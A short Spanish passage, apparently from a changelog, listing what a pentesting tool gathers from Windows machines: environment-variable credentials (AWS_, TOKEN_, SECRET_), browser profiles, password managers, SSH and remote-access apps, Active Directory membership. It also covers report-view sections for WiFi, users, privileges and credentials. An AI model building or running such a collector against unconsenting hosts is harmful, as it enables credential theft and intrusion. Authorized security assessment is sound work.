- Credenciales en variables de entorno (AWS_, TOKEN_, SECRET_, etc.)
- Navegadores instalados por directorios de perfil
- Apps relevantes para pentesting desde el registro de Windows (gestores de contraseñas, SSH clients, VPNs, acceso remoto, herramientas)
- Dominio Active Directory si el equipo está unido a uno

Frontend ReportDetails.jsx rediseñado con secciones dedicadas para cada dato nuevo: WiFiSection, LocalUsersSection, SecuritySection, PrivilegesSection, EnvCredsSection, BrowserSection, InstalledAppsSection con categorización por tipo de riesgo y colores de alerta.